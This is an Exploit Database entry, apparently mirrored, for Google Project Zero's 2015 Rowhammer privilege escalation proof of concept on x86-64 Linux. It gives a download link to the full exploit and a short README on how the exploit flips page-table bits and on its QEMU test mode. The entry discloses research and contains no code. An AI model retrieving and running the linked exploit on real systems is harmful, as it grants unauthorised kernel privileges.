Linux Kernel (x86-64) – Rowhammer Privilege Escalation

• Exploit Database
• 17 阅读

• 作者： Google Security Research
  日期： 2015-03-09
• 类别：

  • local
  平台：

  • linux_x86-64
• 来源：https://www.exploit-db.com/exploits/36310/

• Sources:
  http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
  https://code.google.com/p/google-security-research/issues/detail?id=283
  
  Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36310.tar.gz
  
  This is a proof-of-concept exploit that is able to gain kernel
  privileges on machines that are susceptible to the DRAM "rowhammer"
  problem.It runs as an unprivileged userland process on x86-64 Linux.
  It works by inducing bit flips in page table entries (PTEs).
  
  For development purposes, the exploit program has a test mode in which
  it induces a bit flip by writing to /dev/mem.qemu_runner.py will run
  the exploit program in test mode in a QEMU VM.It assumes that
  "bzImage" (in the current directory) is a Linux kernel image that was
  built with /dev/mem enabled (specifically, with the the
  CONFIG_STRICT_DEVMEM option disabled).
  
  Mark Seaborn
  mseaborn@chromium.org
  March 2015